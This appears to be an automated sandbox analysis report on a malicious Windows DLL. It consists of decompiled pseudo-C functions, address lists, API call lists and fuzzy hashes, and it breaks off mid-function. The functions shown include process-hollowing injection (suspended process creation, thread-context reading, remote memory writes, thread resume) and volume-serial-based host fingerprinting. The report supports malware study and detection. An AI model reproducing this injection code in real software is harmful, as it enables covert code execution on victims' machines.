                                                                                                                                                                                                0x10004cf3
                                                                                                                                                                                                0x10004cf8
                                                                                                                                                                                                0x10004cff
                                                                                                                                                                                                0x10004d42
                                                                                                                                                                                                0x10004d01
                                                                                                                                                                                                0x10004d06
                                                                                                                                                                                                0x10004d0e
                                                                                                                                                                                                0x10004d12
                                                                                                                                                                                                0x10004d1d
                                                                                                                                                                                                0x10004d28
                                                                                                                                                                                                0x10004d30
                                                                                                                                                                                                0x10004d34
                                                                                                                                                                                                0x10004d3c
                                                                                                                                                                                                0x10004d3c
                                                                                                                                                                                                0x10004cff
                                                                                                                                                                                                0x10004d48
                                                                                                                                                                                                0x10004d4b
                                                                                                                                                                                                0x10004d4d
                                                                                                                                                                                                0x10004d53
                                                                                                                                                                                                0x10004d53
                                                                                                                                                                                                0x10004d55
                                                                                                                                                                                                0x10004d55
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004d55
                                                                                                                                                                                                0x10004c8d
                                                                                                                                                                                                0x10004c8d
                                                                                                                                                                                                0x10004c93
                                                                                                                                                                                                0x10004c95
                                                                                                                                                                                                0x10004c9a
                                                                                                                                                                                                0x10004c9a
                                                                                                                                                                                                0x10004c9c
                                                                                                                                                                                                0x10004ccb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ccb
                                                                                                                                                                                                0x10004c9e
                                                                                                                                                                                                0x10004ad7
                                                                                                                                                                                                0x10004ad7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ad7
                                                                                                                                                                                                0x10004c7d
                                                                                                                                                                                                0x10004b5c
                                                                                                                                                                                                0x10004b6a
                                                                                                                                                                                                0x10004b7d
                                                                                                                                                                                                0x10004b82
                                                                                                                                                                                                0x10004b88
                                                                                                                                                                                                0x10004b8a
                                                                                                                                                                                                0x10004ba2
                                                                                                                                                                                                0x10004ba7
                                                                                                                                                                                                0x10004bb0
                                                                                                                                                                                                0x10004bb6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004bb6
                                                                                                                                                                                                0x10004b92
                                                                                                                                                                                                0x10004b9b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004b9b
                                                                                                                                                                                                0x10004afe
                                                                                                                                                                                                0x10004afe
                                                                                                                                                                                                0x10004b04
                                                                                                                                                                                                0x10004b06
                                                                                                                                                                                                0x10004b44
                                                                                                                                                                                                0x10004b46
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004b48
                                                                                                                                                                                                0x10004b4c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004b4c
                                                                                                                                                                                                0x10004b08
                                                                                                                                                                                                0x10004b12
                                                                                                                                                                                                0x10004b1e
                                                                                                                                                                                                0x10004b29
                                                                                                                                                                                                0x10004b30
                                                                                                                                                                                                0x10004b3a
                                                                                                                                                                                                0x10004b3f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004b3f
                                                                                                                                                                                                0x10004ad5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004a59
                                                                                                                                                                                                0x10004a64
                                                                                                                                                                                                0x10004a6a
                                                                                                                                                                                                0x10004a6c
                                                                                                                                                                                                0x10004d57
                                                                                                                                                                                                0x10004d57
                                                                                                                                                                                                0x10004d59
                                                                                                                                                                                                0x10004d5f
                                                                                                                                                                                                0x10004d5f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004a6c

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$CreateHeaplstrcpymemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2074685370-0
                                                                                                                                                                                                • Opcode ID: f8d1c5f3043776e78a8ad2a2277de3e586b41ff0af61318432064fa9292a9130
                                                                                                                                                                                                • Instruction ID: e7809c0e9bed771dc32917bba83ac72b042db24d80611381e3010ef183b58f35
                                                                                                                                                                                                • Opcode Fuzzy Hash: f8d1c5f3043776e78a8ad2a2277de3e586b41ff0af61318432064fa9292a9130
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4791BCB5604341ABF304DB24CC86F6E73E9EB84390F11892DF9558B299EF70ED448B96
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000B7EA, Relevance: 7.6, APIs: 5, Instructions: 83stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                			E1000B7EA(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x1001e684; // 0x4d2f878
				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095C2(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085B6( &_v16);
				_t33 = E1000C3D4(_t43);
				E10009621( &(_t43[E1000C3D4(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C3D4(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D442(_t43, E1000C3D4(_t43) + _t40, 0);
			}
















                                                                                                                                                                                                0x1000b7ea
                                                                                                                                                                                                0x1000b7f3
                                                                                                                                                                                                0x1000b7ff
                                                                                                                                                                                                0x1000b805
                                                                                                                                                                                                0x1000b807
                                                                                                                                                                                                0x1000b80f
                                                                                                                                                                                                0x1000b81d
                                                                                                                                                                                                0x1000b822
                                                                                                                                                                                                0x1000b831
                                                                                                                                                                                                0x1000b83c
                                                                                                                                                                                                0x1000b849
                                                                                                                                                                                                0x1000b863
                                                                                                                                                                                                0x1000b868
                                                                                                                                                                                                0x1000b86a
                                                                                                                                                                                                0x1000b871
                                                                                                                                                                                                0x1000b881
                                                                                                                                                                                                0x1000b892
                                                                                                                                                                                                0x1000b89c
                                                                                                                                                                                                0x1000b8a4
                                                                                                                                                                                                0x1000b8ab
                                                                                                                                                                                                0x1000b8ae
                                                                                                                                                                                                0x1000b8cb

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 1000B807
                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B831
                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B863
                                                                                                                                                                                                  • Part of subcall function 10009621: _vsnwprintf.MSVCRT ref: 1000963E
                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00000114), ref: 1000B89C
                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 1000B8AE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 455400327-0
                                                                                                                                                                                                • Opcode ID: 762bad79624fb650f58724a5ea1e64c263a3eee1a170f4efe313a5a535c72d9b
                                                                                                                                                                                                • Instruction ID: 6fbe4093ac174c6d16cfa6e3d37bce83a44f497b82853686d70f4fe702a36447
                                                                                                                                                                                                • Opcode Fuzzy Hash: 762bad79624fb650f58724a5ea1e64c263a3eee1a170f4efe313a5a535c72d9b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 402183B6A00218BFE710DBA4DC8AFEE77BCEB44250F108169F506D6185EA74AF448B60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000CA67, Relevance: 4.6, APIs: 3, Instructions: 120threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                			E1000CA67(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C93F( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x4cb04a0
				_t7 = _t38 + 0xac; // 0xb8023188
				E1000A8AF( &_v80,  *_t7 + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E100085FB( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AEA8( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CBB9(E10005CCD,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x4d2f878
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x4d2f878
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x4d2f878
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x4d2f878
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x4d2f878
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x4d2f878
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E100085FB(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}



























                                                                                                                                                                                                0x1000ca6d
                                                                                                                                                                                                0x1000ca76
                                                                                                                                                                                                0x1000ca79
                                                                                                                                                                                                0x1000ca7b
                                                                                                                                                                                                0x1000ca80
                                                                                                                                                                                                0x1000ca82
                                                                                                                                                                                                0x1000ca85
                                                                                                                                                                                                0x1000ca87
                                                                                                                                                                                                0x1000cbb8
                                                                                                                                                                                                0x1000cbb8
                                                                                                                                                                                                0x1000ca8d
                                                                                                                                                                                                0x1000ca96
                                                                                                                                                                                                0x1000ca9f
                                                                                                                                                                                                0x1000caa4
                                                                                                                                                                                                0x1000caa7
                                                                                                                                                                                                0x1000caa9
                                                                                                                                                                                                0x1000caae
                                                                                                                                                                                                0x1000cba5
                                                                                                                                                                                                0x1000cbab
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000cbb4
                                                                                                                                                                                                0x1000cab4
                                                                                                                                                                                                0x1000cabf
                                                                                                                                                                                                0x1000cacc
                                                                                                                                                                                                0x1000cad0
                                                                                                                                                                                                0x1000cad1
                                                                                                                                                                                                0x1000cad2
                                                                                                                                                                                                0x1000cad6
                                                                                                                                                                                                0x1000cadb
                                                                                                                                                                                                0x1000cadd
                                                                                                                                                                                                0x1000caea
                                                                                                                                                                                                0x1000caf2
                                                                                                                                                                                                0x1000cafd
                                                                                                                                                                                                0x1000cb08
                                                                                                                                                                                                0x1000cb0c
                                                                                                                                                                                                0x1000cb0e
                                                                                                                                                                                                0x1000cb1c
                                                                                                                                                                                                0x1000cb24
                                                                                                                                                                                                0x1000cb29
                                                                                                                                                                                                0x1000cb2b
                                                                                                                                                                                                0x1000cb30
                                                                                                                                                                                                0x1000cb36
                                                                                                                                                                                                0x1000cb38
                                                                                                                                                                                                0x1000cb38
                                                                                                                                                                                                0x1000cb39
                                                                                                                                                                                                0x1000cb39
                                                                                                                                                                                                0x1000cb3f
                                                                                                                                                                                                0x1000cb3f
                                                                                                                                                                                                0x1000cb0c
                                                                                                                                                                                                0x1000caf2
                                                                                                                                                                                                0x1000cb46
                                                                                                                                                                                                0x1000cb4a
                                                                                                                                                                                                0x1000cb4c
                                                                                                                                                                                                0x1000cb55
                                                                                                                                                                                                0x1000cb55
                                                                                                                                                                                                0x1000cb5b
                                                                                                                                                                                                0x1000cb63
                                                                                                                                                                                                0x1000cb66
                                                                                                                                                                                                0x1000cb6e
                                                                                                                                                                                                0x1000cb6e
                                                                                                                                                                                                0x1000cb74
                                                                                                                                                                                                0x1000cb77
                                                                                                                                                                                                0x1000cb78
                                                                                                                                                                                                0x1000cb7e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000cb7e
                                                                                                                                                                                                0x1000cb84
                                                                                                                                                                                                0x1000cb87
                                                                                                                                                                                                0x1000cb88
                                                                                                                                                                                                0x1000cb8d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000cb93
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000cb93
                                                                                                                                                                                                0x1000cb93
                                                                                                                                                                                                0x1000cb96
                                                                                                                                                                                                0x1000cb9c
                                                                                                                                                                                                0x1000cba0

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 1000AEA8: memset.MSVCRT ref: 1000AEC7
                                                                                                                                                                                                  • Part of subcall function 1000AEA8: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEE7
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: memset.MSVCRT ref: 1000CBFA
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CC1B
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC64
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC81
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CCA2
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CCB5
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001), ref: 1000CB0E
                                                                                                                                                                                                • ResumeThread.KERNELBASE(?,?,00000001), ref: 1000CB1C
                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,00000001), ref: 1000CB3F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MemoryVirtual$ProtectThreadmemset$CloseContextCreateErrorFreeHandleLastLibraryProcessResumeWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 255987474-0
                                                                                                                                                                                                • Opcode ID: 2a10f3cc339254d40ee41b5592b70f33da5932e0e66a0b2b744347cadce608bf
                                                                                                                                                                                                • Instruction ID: 3ef074fd157ae3a348140e56fcf03946d4ddcfbfb6d77322afef2d25fd173654
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a10f3cc339254d40ee41b5592b70f33da5932e0e66a0b2b744347cadce608bf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 32415F75A00319AFEB01DFA8CD85EAD77F9EF58390F1140A9F501A7265DB30AE058B51
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000B9DA, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E1000B9DA(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E100085E5(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E100085FB( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                                                0x1000b9dd
                                                                                                                                                                                                0x1000b9de
                                                                                                                                                                                                0x1000b9e5
                                                                                                                                                                                                0x1000b9ed
                                                                                                                                                                                                0x1000b9f1
                                                                                                                                                                                                0x1000b9fa
                                                                                                                                                                                                0x1000ba40
                                                                                                                                                                                                0x1000ba40
                                                                                                                                                                                                0x1000ba07
                                                                                                                                                                                                0x1000ba0f
                                                                                                                                                                                                0x1000ba11
                                                                                                                                                                                                0x1000ba17
                                                                                                                                                                                                0x1000ba30
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ba32
                                                                                                                                                                                                0x1000ba37
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ba3d
                                                                                                                                                                                                0x1000ba19
                                                                                                                                                                                                0x1000ba19
                                                                                                                                                                                                0x1000ba19
                                                                                                                                                                                                0x1000ba19
                                                                                                                                                                                                0x1000ba17
                                                                                                                                                                                                0x1000ba46

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74E5F500,00000000,10000000,00000000,00000000,?,1000BA79,?,00000000,?,1000D0EA), ref: 1000B9F5
                                                                                                                                                                                                • GetLastError.KERNEL32(?,1000BA79,?,00000000,?,1000D0EA), ref: 1000B9FC
                                                                                                                                                                                                  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA79,?,00000000,?,1000D0EA), ref: 1000BA2B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InformationToken$AllocErrorHeapLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4258577378-0
                                                                                                                                                                                                • Opcode ID: d13d889bf0ca5db9f192e6445616415cc53c3623965db097e345c1a7986b79ae
                                                                                                                                                                                                • Instruction ID: dc97b82a1168bf372b5b35b8b27bcafeff9889a83a5ec1aeb575cc372d21a50b
                                                                                                                                                                                                • Opcode Fuzzy Hash: d13d889bf0ca5db9f192e6445616415cc53c3623965db097e345c1a7986b79ae
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B018F72700629BFA724CBA9DC89D8F7EACEB866E1B114525F505D3114E670EE0097A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000AEA8, Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                			E1000AEA8(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}








                                                                                                                                                                                                0x1000aeb1
                                                                                                                                                                                                0x1000aeb7
                                                                                                                                                                                                0x1000aebb
                                                                                                                                                                                                0x1000aebc
                                                                                                                                                                                                0x1000aebd
                                                                                                                                                                                                0x1000aebe
                                                                                                                                                                                                0x1000aec2
                                                                                                                                                                                                0x1000aec7
                                                                                                                                                                                                0x1000aecf
                                                                                                                                                                                                0x1000aee7
                                                                                                                                                                                                0x1000aeed
                                                                                                                                                                                                0x1000aef5

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 1000AEC7
                                                                                                                                                                                                • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEE7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateProcessmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2296119082-0
                                                                                                                                                                                                • Opcode ID: 8c29a61a13423dceb297ef815b3e325dc24f1881b50a7eb161cc800cabedd468
                                                                                                                                                                                                • Instruction ID: 0997fecb199d7764c3e0643272f6287b5d82213bfaf3eac72fe53d36cf3c819a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c29a61a13423dceb297ef815b3e325dc24f1881b50a7eb161cc800cabedd468
                                                                                                                                                                                                • Instruction Fuzzy Hash: C9F01CF26042187FF760DAADDC46EBBB6ACDB88664F104532FA05D61A0E560ED0582A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000E1FE, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                			E1000E1FE(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095A8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E1B3(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085A3( &_v8);
				return _t25;
			}










                                                                                                                                                                                                0x1000e201
                                                                                                                                                                                                0x1000e204
                                                                                                                                                                                                0x1000e20a
                                                                                                                                                                                                0x1000e20c
                                                                                                                                                                                                0x1000e211
                                                                                                                                                                                                0x1000e213
                                                                                                                                                                                                0x1000e21d
                                                                                                                                                                                                0x1000e21e
                                                                                                                                                                                                0x1000e22d
                                                                                                                                                                                                0x1000e220
                                                                                                                                                                                                0x1000e220
                                                                                                                                                                                                0x1000e220
                                                                                                                                                                                                0x1000e231
                                                                                                                                                                                                0x1000e238
                                                                                                                                                                                                0x1000e23e
                                                                                                                                                                                                0x1000e23e
                                                                                                                                                                                                0x1000e243
                                                                                                                                                                                                0x1000e24e

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA20), ref: 1000E220
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,1001BA20), ref: 1000E22D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4133054770-0
                                                                                                                                                                                                • Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                                                                                                                                                                                • Instruction ID: 74ff8a95a41aeaeec01c10c3edac8cd294b9b37b9d7a58d21f84c2d18d0caf3a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BF08271700154ABF708DBA9EC8589AB3ECDB943D1710412AF505E3254DAB0EF4087A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000CD02, Relevance: 2.5, APIs: 2, Instructions: 48sleepstringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000CD02(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
